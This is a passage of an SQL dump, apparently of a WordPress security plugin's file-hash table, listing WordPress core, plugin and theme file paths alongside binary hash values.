Ϣ>r�7Nj��	D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('r�	�e���Z���\r','wp-content/plugins/wordpress-seo/admin/class-admin-editor-specific-replace-vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=M��.����Z','���DU�\"P�[Y�̮l���6_n�L��','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('���� 	��\\�A','wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-wpseo-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)w�p�2V��\r\nfL��','�O�)r���\n-]�͂;/](�I�?U5�Ѐ�518','',0,'?'),('��S��)�v�����','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',0,'��e�-{\'B�����Qa','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('�\Z�C_Wϕ-ȝ	3','wp-content/plugins/wordfence/modules/login-security/js/login.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��x�\"�!�ق\0��y','[�Jo�w����-��`�3����-�aQ','',0,'?'),('�o��a�N�/u$L<�','wp-content/plugins/wp-smushit/_src/js/app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[���dl�����e','�el�dkTj�;��?�`��@�J��G� ��m-.n','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D���k���O���','X\"���Q+Ræ�ə�̺�����Z!��<','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y+�qS�\r7��3ČIYB','D�{����\Z�/�|��[��j��>�(B�j','',0,'?'),(' \r��-�Uz�\r�aK','wp-includes/blocks/pullquote/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�*�aõ�ĭ�c�F','�6����ʃ�\\-R=��pZ�ͪ�\\4���J','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' G�\r��%5.�{','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[R���	N�(','\0��w1��N�|��]m�|jZ���h�???��','',0,'?'),(' U�Ӵ�xF�f��?','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ServiceCircularReferenceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�ݔ�c!9�����B�4','����!�\0Z�~���~��O2\"!\"\r��Ń��','',0,'?'),(' ��ɉ:�s�{1<�','wp-includes/blocks/embed/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\d����f.#H','`c\\j\"$�~��M�u�vZη��o�td=I��lx','',0,'?'),(' \'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=؃\\5�ץړ#�q�b','�r��6z}���ߙːa���\Z�	iy-\"M','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E�Tը��Q�j��x�','�7L���(�0��~ZWoԚ�DS�=�~\\�I=�','',0,'?'),(' +�1��n_��ު����','wp-content/plugins/wp-cerber/assets/flags/gq.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QdP$�?�e���yӖ5','=2\0Y�c[��\Z�	�Cf�@�-6�;��K[�','',0,'?'),(' 1c0�x\n��q\n\Z�!iM','wp-includes/wp-includes/class-wp-oembed-controller.php',0,'\";�r��\Z(FAU','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\����O��R�S�',']��Jo���k��qK�$\Z���ȥyt�\'�','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' E^g�\'�ԭfQD�','wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-notification-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���7�_Mb��W�','-�j�zKIKӌ��j[\r#�5��v�6p���','',0,'?'),(' E���hܺ�/UB��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Middleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�jH�턱V=Sf','�Kev�[�殱�C4�Ù�PS-��8:8�:','',0,'?'),(' R�I���|Y`R�Z','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'%!N�D���Id\"','� ��=����-2�>i\'q���?T�Η�8&&|','',0,'?'),(' V��K+�L\Z*!���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[7a���~�e��','��W�=\r����qZ�*>�\"U謇Yy$��','',0,'?'),(' w���Wߛ�B��','wp-content/plugins/wp-smushit/app/views/dashboard/cdn/meta-box-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̞�\n<�<��D^#�','�D(3�&\0�PIB7*!���?x�\':_ۧ��','',0,'?'),(' ����=���i;[�','wp-includes/blocks/require-static-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','60ɞt\re�ݗx�','�\r\0>��Yh��<��닩����ܭ<-D�w','',0,'?'),(' �y��>4�l��gR�','wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�Z� 8�Z�','��y� �q��k���j���|���gY{���','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�(	ia�Y���(','����%��\Z0b��[u�#�v.�_��	O�=0','',0,'?'),(' ��$1p<���6�','wp-content/plugins/wordpress-seo/src/integrations/watchers/option-wpseo-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-bkg��P�U9^Lg��','��L36Z��PF������y��I�','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V|�	�>׺謮U$��','X�S��.m�r��m��t��nOew��G$�Ϫ��`�','',0,'?'),(' �cNq̻�\\�ѭ�','wp-includes/wp-includes/css/buttons.css',0,'���[��\\���.�','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),(' ��NJi2�zl�L�(','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',0,'�l�{�bOs�_a��>','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),(' �7=��4���#�N�','wp-content/plugins/wordpress-seo/admin/class-yoast-dashboard-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�n	p#K~��d','�Yx)�g�d�I���p-��awW7E���\ZR','',0,'?'),(' �\r$	Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)Y{�Q���[��','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' �)�m��{��)Wj�','wp-content/plugins/wp-smushit/app/views/settings/data-meta-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�~����!HX(��','�k4uH����_	��=�B��a�RT}�N�{�','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),(' ������t4${�SE','wp-includes/blocks/categories/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�?B���wHϓb�','1�;� 	\nol�\rK~qR�@\"��ֿ\'y�:�=[�','',0,'?'),(' ������	f���O','wp-includes/wp-includes/css/wp-pointer-rtl.min.css',0,'���k�d�\\n�Ue�S@','���k�d�\\n�Ue�S@','������7�Z%\0L�|��I�`��?{hl�G�\\','',0,'?'),(' ���F>����e$+�','wp-includes/wp-includes/js/clipboard.js',0,'Ԓs� 5C�ɚ�b��LF','Ԓs� 5C�ɚ�b��LF','���ʿ�Iv�+>Y�h�b�F\\x��v�.wT','',0,'?'),('! ��QB�z/Mz�','wp-content/plugins/wp-fastest-cache/images/check.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{mGp�8fA5����','���Q�B}Ma}��s�[ߤ��CK�*�2��','',0,'?'),('!�7��uh��K�m�i','wp-content/plugins/wp-cerber/assets/flags/fr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�]M\0E�xР7�v','�z��k ���YjO��J��[W��R','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hq\r��E���7��\n�',';�$x/�y��6}r*I:(|T�O��e+p\Z%I��','',0,'?'),('!H�u�fɁD�7�>=g','wp-content/plugins/wordfence/lib/wfLicense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G|iǭ,�fv#�$�U','H%�j��7��M��4$�\\^[`��M�?��','',0,'?'),('!)3�upX��>My���','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-term-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\Z�!`Jn��%','\0HE���l�l�B�0�_�\Z���g�6��˩�','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z���C�\0��Ol$�','sT�lEe��Bh�v:�g%�k��07k=��&!','',0,'?'),('!Dxɐ�г��[t�Q�','wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js',0,'��V\\\n]��K�s\'�','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő�	2&�H','',0,'?'),('!|��8���I,�� ��','wp-content/plugins/wordpress-seo/admin/class-collector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�xw�^Z','X+�\'=�	��`owH�r��2UY!���;�)�GM�','',0,'?'),('!��G�rx@\Z߻�~s','wp-content/plugins/wordpress-seo/admin/views/licenses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z����)�G','.R-}eģٳI=����4X�Pl��x�i{�Yz','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��Ã� ��=Sn�','�i���eD�2�����/�ʷ�k�Q�.���','',0,'?'),('!��d�p\nH�]�G-��k','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png',0,'�¶��B�=\rz��3j�','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:����$6\'jq~�|','À�MpG4�І=��i�8p@>�\r�\rk�','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!��>�NN����ٌ�','wp-includes/blocks/file/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�j\Z��褀<������','W�e7�ݖ�wð}���s�t	l�0�p�2','',0,'?'),('!����8~W��>B�','wp-content/plugins/wordpress-seo/admin/listeners/class-listener.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��9z�%��0�[Ӽ','���6�\Z*G-��+�c�)��|��&[`^3','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����-�ߠ2g�l�','Ӏ���OD��I{`�b��ı�=ʬs�m��q.','',0,'?'),('!��\')�qM*�Xc','wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��*q�e��i,`�','۸�k�F�ԧ���+���\\=��<)��','',0,'?'),('!ӛ�h�;�i(�r�','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/google/googlefontapi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��}\"�\Z?}F','�\'Q���5��i,�\n,J����������R���','',0,'?'),('!�R���p�nL�w�m7','wp-includes/js/tinymce/plugins/lists/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('!�\\Ϩ��\'� �jn�','wp-includes/wp-includes/css/admin-bar-rtl.min.css',0,'�4�܀	���,玒�[�','�4�܀	���,玒�[�','F��L5�%��$�e��&q�(����W-n)�m\'','',0,'?'),('!ہ�Iǵ�`��8�t','wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����V1Fl͂�','	�}\"�U��o���ޘ���\Z���}{\\)���	','',0,'?'),('!�LjztO��֔~TcI>','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-ids.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s{��&��W�Á(�','Z�\Z�=��e5*��S��z=g)�J5փ�)���','',0,'?'),('!�Tۦ����	l�I�\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɳ��xm46c)��','en�*���~�a�يc]��Zbi�XCq��','',0,'?'),('!�-�\r.��d7O�','wp-content/plugins/wordpress-seo/src/presenters/webmaster/bing-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\W��ȹz�X#�}U','�7Zh�\Z]7`�N�`�ň\ZT�(ێ�J�ac�0J','',0,'?'),('!�>лӊ^��[��U}�','wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{����fK~DZ�','=���! @dyO5\n���P݁�_Bl�i��Y,P','',0,'?'),('!�O�4�bCRR�fO�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�Z:3�hr�$~�','�FC��5#���C��<޺bG�G�!��̮�@','',0,'?'),('!��Y0-z1�dm>�','wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�Do����Flz�','^��E����XD�o���v�orW��x�Y��\Z','',0,'?'),('\"\n���4j�SË�','wp-includes/blocks/spacer/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�k���k�3z��U)�','u2�T��z\"����-g���&]�V�j��$O>�','',0,'?'),('\"Et�y�s����\Z|g','wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E	��-N�o����','�L�I‘�™Y�ow�)�4!:�;?��','',0,'?'),('\"\r↻�7l~��˝A�','wp-includes/blocks/text-columns/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$6Eɫ8�y','�\\{�1�E��H=F�\'ֱ��L�=t�0�X�','',0,'?'),('\"(}G��r�	0��V(','wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<�b�s�\'�+�\Z�Q','q�J��R�_+�V�C%�~d���35k��x��','',0,'?'),('\"0�rN1M���#���','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('\"8A\n=��ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;��C�Q5��z��','4��7���:V�]�L�,�B���R$2pz�񁇹�','',0,'?'),('\"I�(\"�m���s���','wp-content/plugins/wp-cerber/assets/flags/cg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�;�C��a���d�O�','�ОPY�<\"V6�����g�f��!�j nd','',0,'?'),('\"IFn����@�a�}�9','wp-admin/includes/class-wp-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɗ��a�b*�7˖K','�H^,��O�>���[KJM�|։����ev','',0,'?'),('\"N�M�����k�VO','wp-includes/js/dist/data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H҉�I�lI������','�L��j)<\0�ˬAK�+Bt#	}ܝA���ޜ','',0,'?'),('\"Y��:n���A���N','wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<}�� �Ȏ��� ','���}LGR�:�}Vʶ��G[�|�+�i�ht��','',0,'?'),('\"\\���)�r�n>�k�','wp-content/plugins/wordpress-seo/css/dist/elementor-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8HWW�*�m��M�V�� ','s�6֯��M.Oˀ�c��R��a�O�ޱ+�','',0,'?'),('\"huy=��,����v�','wp-content/plugins/wordpress-seo/src/presenters/twitter/creator-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�YPq��cr6�','�-\n$��P�o�i{b�bii;�1�۹[����','',0,'?'),('\"n�˅�1��UB1S','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/StreamInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�ϼ@}7>7���n�','���:��m�-y��*~���h�BB=��','',0,'?'),('\"q����	K6A���!','wp-includes/css/dist/reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk-Q6U��J��Ӂ','��ѹ��Q!!�T��Zk�0����\\���','',0,'?'),('\"v5�_�=��`�|�}�','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-woocommerce-shop-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5�j$E�MzbG��','V\\���\n]�֓���U�)R�M%d�$J�	&Q','',0,'?'),('\"��;�\r�����ݯ�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/selectWoo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jS�y�YQ2�Mer��','.QH(*�6�X 1�ӷ*g��δ6��C�O�#','',0,'?'),('\"���K�6^�4V�}��','wp-includes/blocks/spacer/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�J#�� O)-� �s','FX���`�A�e��>D@K`ғ�޳B4p�s','',0,'?'),('\"��c���;B)�D���','wp-content/themes/hitmag/inc/kirki/core/class-kirki-sections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]� ����>��Aᠼ','w�XSC��	q\\��k�mˊ�2=?c^��I*','',0,'?'),('\"����b9��e�|�_�','wp-includes/feed-atom-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('\"����ۯ��6��7?','wp-includes/blocks/site-title/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u{(�)��J��R��\\','�y�]����3;��Zv�D�(&�|7��cz\'�','',0,'?'),('\"�����u>1�7���','wp-includes/class-pop3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~���k�X�_��','*�,\\d�W̅�\Z��)`9�N�Q�@J5h&G�','',0,'?'),('\"�6�Q��\0��\\Z�:','wp-content/plugins/wp-smushit/app/assets/images/plugins-hummingbird-icon@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t����\"��Y\'�','l��������o���]3\\@GT+��9�w�)،�','',0,'?'),('\"��6\r+K{�\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lt�3d̨ۤ� Y��','��&�y%�\0��>DA.��>amRbB�g��','',0,'?'),('\"ב��K��W)�','wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css',0,'�M\"7����g��6>','�M\"7����g��6>','WM�����r�0���y7:5э�C<�o����','',0,'?'),('\"�w��h����','wp-admin/includes/class-automatic-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�C|��','�v\Z������K\'Em\"�ja�;�u�.6�}','',0,'?'),('\"�$��aV\n��m�','wp-content/plugins/wp-cerber/assets/flags/tw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Olq��C��i�E��','�%*G��ף��~LO�.�MC|�FH����W','',0,'?'),('\"ڬ<ř�6�Թ��s','wp-content/themes/twentytwentythree/patterns/hidden-no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C!�;�C0lzM��Oe','[�BK��������t��H�/�,_�K�,N��','',0,'?'),('\"�_���,y�O�\\���','wp-content/themes/twentytwentythree/styles/marigold.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�	�a,�D<s��',' ���M–#/{<v�M��UH���\n�)e�_','',0,'?'),('\"��0�\0�L�\'M��','wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('\"���^+����3�-','wp-content/plugins/redirection/matches/server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oz��|�os�%�f�','C��?�O�ϋ�\"�l��CD�02��:�;�~�','',0,'?'),('\"�D�Z~\0�|�3���','wp-includes/blocks/query/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��F%��l��7YV�','��L/�?���e�\'�~#.%�2+�}$\Z���u?��','',0,'?'),('\"�J���2�\rߤ-H�&','wp-includes/js/dist/date.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�e��Y�m�8','��x��χ��\\��\0q//͘��<�\'%Z�c�Y�','',0,'?'),('\"��1�9�<@�pS�;�','wp-includes/wp-includes/comment-template.php',0,'V��|?�M��=]J��','V��|?�M��=]J��','�4x��������!Gk˙���Lto�!��\'�#','',0,'?'),('\"���5��}4Z�D�C_','wp-content/plugins/wordpress-seo/src/integrations/admin/configuration-workout-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OW�~zJ^�K0�>w�1','Ku�Q��G�6>F�l��z#Ǜ�Q��B��','',0,'?'),('\"���?���c���E�c','wp-content/plugins/wordpress-seo/css/dist/monorepo-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TJ�njS��\'H�/x�','NA�m�r�p�y�F��X�w����L�Nþ�','',0,'?'),('#��\'Қ���,\0V','wp-includes/wp-includes/class-wp-customize-setting.php',0,'-j�b�4k2�`�s@','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('#\n��/��PZ~h��','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I*kC�e;�P����S','��_\'\\q��F0��{�ТF�\r��.�OK','',0,'?'),('#����9��|�2GX�','wp-content/plugins/wp-fastest-cache/js/lang/tr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0-#�~�\\�+~~�d�	','tQ3��K#h}9��_���%����R,�I�k���','',0,'?'),('#�[c�أ�^y�O�','wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-account-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��7/��W�N?�9','3��c���\r�	��r���]��Ri�\"(�','',0,'?'),('#49��%��8n{Ӂ�t','wp-content/plugins/wp-cerber/languages/wp-cerber-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\'c�7� 6��y��2','����\r>V��f�;Æ\Z������(��/4�','',0,'?'),('#4��iGv�u+B��.','wp-content/plugins/wordpress-seo/inc/sitemaps/class-post-type-sitemap-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X]�K����q�.�>kp�','yHPvu�\0ր�E���Ǔ�N)ѥ՟z�p�֔','',0,'?'),('#D�ń�����5%��','wp-includes/class-wp-hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�^<�k��֓y9r','XevI0�����	<��e��\Z|�S��2}X�','',0,'?'),('#Gp\\���=�e�_','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/de.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������^�𮮧L','A�GnjK�B\"�����+T4H�O��uGgM\"�S�','',0,'?'),('#R^#u�5~BQ��','wp-content/plugins/wordpress-seo/src/builders/indexable-term-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��_�rE�wA&�X�','|�|(k�SŸ�y���&����y�z�bIH','',0,'?'),('#U)������&��e','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4�F�\n�`l��','zP�՟p��VC/-�є�ܗ�	��8Nƹgk��9','',0,'?'),('#t�n2����=�^V','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��\r;V2~\nCfl_�',':�|�\r��=$&:;�F��������	��#M�','',0,'?'),('#y���NI��>t���','wp-includes/wp-includes/class-wp-simplepie-file.php',0,'��88A�`�w+��p�T','��88A�`�w+��p�T','�8u]�p�Q_�t�Rۮ]o}e5#�P5b2BU��','',0,'?'),('#y���t(�$NT��t�','wp-includes/Requests/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r���|�P4&.|��','�%Mu���#��g��]�zmܦ���8���u�','',0,'?'),('#|F̉�%�������\Z','wp-content/plugins/wordpress-seo/src/routes/supported-features-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H}��